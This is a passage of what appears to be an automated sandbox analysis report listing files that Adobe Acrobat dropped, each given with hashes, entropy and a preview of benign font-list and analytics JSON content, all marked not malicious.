Preview:p...... .........$J.>X..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:PostScript document text
Category:dropped
Size (bytes):1233
Entropy (8bit):5.233980037532449
Encrypted:false
SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:8BA9D8BEBA42C23A5DB405994B54903F
SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:false
Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:PostScript document text
Category:dropped
Size (bytes):1233
Entropy (8bit):5.233980037532449
Encrypted:false
SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:8BA9D8BEBA42C23A5DB405994B54903F
SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:false
Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:PostScript document text
Category:dropped
Size (bytes):1233
Entropy (8bit):5.233980037532449
Encrypted:false
SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:8BA9D8BEBA42C23A5DB405994B54903F
SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:false
Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:PostScript document text
Category:dropped
Size (bytes):10880
Entropy (8bit):5.214360287289079
Encrypted:false
SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:B60EE534029885BD6DECA42D1263BDC0
SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:false
Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:PostScript document text
Category:dropped
Size (bytes):10880
Entropy (8bit):5.214360287289079
Encrypted:false
SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:B60EE534029885BD6DECA42D1263BDC0
SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:false
Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):295
Entropy (8bit):5.390220230795998
Encrypted:false
SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJM3g98kUwPeUkwRe9:YvXKX43sMsdTeO6anGMbLUkee9
MD5:4D38E149530DB51DCDBFF677ECEE54C4
SHA1:324DC78808CB8A2C032E4F77A35E0102D7BEAD90
SHA-256:12F69DD5FA1B93E2C707D141786EB747140B6D045B9B048AA40DBA1CA71A9433
SHA-512:A8AEABE12D0D471E66CF6771604A9FD9F964BBAADD6BD82668874ADF2B57189E780AC3C7DC92B2187178B7D906CCE89412433AC4D1646519FE13FC719EA89284
Malicious:false
Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):294
Entropy (8bit):5.328412172168555
Encrypted:false
SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfBoTfXpnrPeUkwRe9:YvXKX43sMsdTeO6anGWTfXcUkee9
MD5:E445435A9D3F10392573432B6F786083
SHA1:7120254955E764235FB83D2F7E204416D2283754
SHA-256:9B0475B67B03C6AFD0115594C6A13EF0A3311A86A6D14BB327D90BC45889597C
SHA-512:62C0BCDFAFE33C646FADEA15CA8D163ABA6A09D96A99D4C6200A75A958BC455CA24DA3CE76D256D9F0975E8C9400DBCB98655670ACC477688B619082B540351A
Malicious:false
Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):294
Entropy (8bit):5.305955370387177
Encrypted:false
SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfBD2G6UpnrPeUkwRe9:YvXKX43sMsdTeO6anGR22cUkee9
MD5:A4795AC59851EAB0B44B046AC958A766
SHA1:D17E5FD226315CF52AA41AE451776F89D06D6C6C
SHA-256:CE730DAD8B0A80460495B11EFAEE3D53A07F5FB567341D998FB3FD14DB8FF24A
SHA-512:AD0EDED3435C79F6E410B57D13546DE6E594707826A2D0BF396259E442F148E0133D42D7E0A51430CB3BA859496878E60FC615112705BEA1AEFDA85F12CDC283
Malicious:false
Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):285
                                                                      Entropy (8bit):5.378040879371123
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfPmwrPeUkwRe9:YvXKX43sMsdTeO6anGH56Ukee9
                                                                      MD5:AABB70D2C396AA44C0BB92631BB3999B
                                                                      SHA1:FE158A783EE41AC257AFC887282F997691E71E9A
                                                                      SHA-256:6D1926E075711775BE32F4D43412CA318924CAC3D3795FAC8210486FD84985ED
                                                                      SHA-512:0E738E199E02D53FC922EE83AE13ECA224C6232D0DE618907F8B3C3953579B5B8021BCA48463E3EF0001547D2A84AA546B695DC549D0347AD775F6BE44E49775
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):1123
                                                                      Entropy (8bit):5.6896372347216415
                                                                      Encrypted:false
                                                                      SSDEEP:24:Yv6X43sMmeOypLgE9cQx8LennAvzBvkn0RCmK8czOCCSE5:YvXUeNhgy6SAFv5Ah8cv/E5
                                                                      MD5:E6BD2CC85EEB8063334EEDCE27D6E030
                                                                      SHA1:6E84E1234375F51166D69A81C923CC770EDE0A50
                                                                      SHA-256:68B29E281B2DD0435CD9351C982AAED20FBA739B5BA70DC226EB3AF17DAE3E6B
                                                                      SHA-512:B6B817B68D2C23E3DD43496FA2E9847E6FB5E118902D34615D2E715A400C438675133D0A4F59C6F97AA29E0384D3626F26B34A272CE3CF861D4193C3B676B8FD
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):289
                                                                      Entropy (8bit):5.314844706734747
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJf8dPeUkwRe9:YvXKX43sMsdTeO6anGU8Ukee9
                                                                      MD5:F23FC057E4A4AE55F16E27C1D520F2FC
                                                                      SHA1:1E314B7CDAC1735D6B7EE408E4B5EAF6CB87700A
                                                                      SHA-256:F2EFE07B0EBEA3C60257EDDDF2A7EFFB47C57336A8F4E742A185F5266A596227
                                                                      SHA-512:C65F6E2C1D17CDC02A4E937E89FEAB49ED319F08F896C5F598B59A762639B1344572BE64B6847D219D4A8695C8AF5AE18EAA5CF90FFD70E4B8420277330DE570
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):292
                                                                      Entropy (8bit):5.319192625025622
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfQ1rPeUkwRe9:YvXKX43sMsdTeO6anGY16Ukee9
                                                                      MD5:6BA54AE3FFCE6B7FF4F92FAAA942DD61
                                                                      SHA1:F9331F5AAA51669F61088939E640744BD840E7C4
                                                                      SHA-256:63854316219248003242E45A76A9719B60280ACBCC07635398CBE77A3302B7B2
                                                                      SHA-512:FA8C858898F766705BBE040753F06A365D74DF7FB25EF491C7B85B21CA4BEE70C86B6DC3AF913675DCA8900589C2A7AC4740743E3C92BE348457D200255E43C5
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):289
                                                                      Entropy (8bit):5.33476035936328
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfFldPeUkwRe9:YvXKX43sMsdTeO6anGz8Ukee9
                                                                      MD5:4621A64C3F9DD3A7E0D8E251BF3BD061
                                                                      SHA1:948A6738C086F2365B52EC36356B6C9B42263B40
                                                                      SHA-256:CB0EB93FD2906F8727C9AE07405D41BA5F5E545A5A3108CDF61203158D734D9B
                                                                      SHA-512:5AA4E9E933DB0B3A1D2B9382595BCFC6B75E025D1AD1EC5CB92BDD05C99FAC0DAA9DC0F21700902FF8C0151F22E613114118674D1B4F66BB9AB7F2BF29E46635
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):295
                                                                      Entropy (8bit):5.341713737479764
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfzdPeUkwRe9:YvXKX43sMsdTeO6anGb8Ukee9
                                                                      MD5:7CA2BB4997BE1066727C022021B47C9D
                                                                      SHA1:7F96F542D83CF8B4963962B9C2E0DEB7F926AA06
                                                                      SHA-256:2A435C84B2C4E9DB5708110A3700A0C71C06D55D917CE6687EB204A65318F444
                                                                      SHA-512:0A04F5D2FD5320480C9F7C032230DE471F543468EC54F102B80D42818EB5E7082E893A2E11A0B278E6D581BFCB11E8D45D734433F4D7F5EBEE8CAC81D1F7FA43
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):289
                                                                      Entropy (8bit):5.322821496514238
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfYdPeUkwRe9:YvXKX43sMsdTeO6anGg8Ukee9
                                                                      MD5:7AE8800A4FA1FD2B8B1CB9BC28C474D7
                                                                      SHA1:9171CBF885C7911C092A0E09125BFC4E0578E984
                                                                      SHA-256:CED1CE8A8D4620A7FA33E8C8F059F81D65EC3E8A78408A113B7FC0C0C2B37479
                                                                      SHA-512:0481F182B0D8D617A48C88BAA6690EB817B23E163B10BC70DFA866C816E4E559D6E8AFB503BF76A54A314DF1C6BC69BB087F2A647C25E4705E9F07CCC373381D
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):284
                                                                      Entropy (8bit):5.308955954714532
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJf+dPeUkwRe9:YvXKX43sMsdTeO6anG28Ukee9
                                                                      MD5:E168020A039F89F75D79B10535BFFE32
                                                                      SHA1:06053AA12CBA26402BDB8F7DED1F7CEEDAAC5C3B
                                                                      SHA-256:2AA80D5F4A2C61B83C9D7424F55A11CE912C588D36BA99502C19A2A8F8A39E8A
                                                                      SHA-512:389A27E1A63F093DDD00AD4D139751220416DBF539AB5579106FB40F62086DE55700C28E231DB905487831FE47CA3C01E9C788BDD283F719820C39F9D2F469FD
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):291
                                                                      Entropy (8bit):5.3062117454148074
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfbPtdPeUkwRe9:YvXKX43sMsdTeO6anGDV8Ukee9
                                                                      MD5:CD3987385D474BE6C1DF31D77D80CCEB
                                                                      SHA1:8E825F2F9F63362EA5AB725E218D676B09B6E2A8
                                                                      SHA-256:FDAB322CAFAFE125CB9A2FCC2AAFCBCA0DB8C55AEA110708097783A16FEFE8B2
                                                                      SHA-512:A18C2B317016348AFF2AB8E77EFDFFC2F88CDFCB622597F765C55806E6B250B191FEA2CEC8AEAE502B467E55A7E909C4A2078DD56F3A5EAC41E1134A9CE4F508
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):287
                                                                      Entropy (8bit):5.311179081643241
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJf21rPeUkwRe9:YvXKX43sMsdTeO6anG+16Ukee9
                                                                      MD5:79C3ACEE8A8BC0815883E6BE9F3A10C9
                                                                      SHA1:50D56E9039B89AB67ACB7FE6FCA5EA271F51AC26
                                                                      SHA-256:DD77AC569054879124F9D217EE0161DF9FC95345FF610386C46AB6EDD9A46C5C
                                                                      SHA-512:B14000FF6D641BD6814361188EE6D721669D916F356B3B6523F71B6560331E8766915A00F8DE98769D756927362316734FAAF0CD9E71A6466F4C04F8AFE81BAC
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):1090
                                                                      Entropy (8bit):5.663043833134792
                                                                      Encrypted:false
                                                                      SSDEEP:24:Yv6X43sMmeOuamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSE5:YvXUepBgkDMUJUAh8cvME5
                                                                      MD5:ED2E4EB0870EC273AFA1CD19223CB8AA
                                                                      SHA1:B39825ADBD5DD725088670A264A427A7AC9CBF2F
                                                                      SHA-256:5EE05027A7EC5F137A31746AED9F510A40532F97C8A9EDD70A94C4230D0AB146
                                                                      SHA-512:FC46270CCB2DC5B1AB71D74364373A5F00091EEC855D79ECB1DE03BEEF6DBD09F0A472BB8661921A72947CCB89D7EC7AEA1871F3C196CBF0E774D4391B733F0E
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):286
                                                                      Entropy (8bit):5.286288399205933
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJfshHHrPeUkwRe9:YvXKX43sMsdTeO6anGUUUkee9
                                                                      MD5:A4D83DD73094F5280AA0A2F63BFD5A37
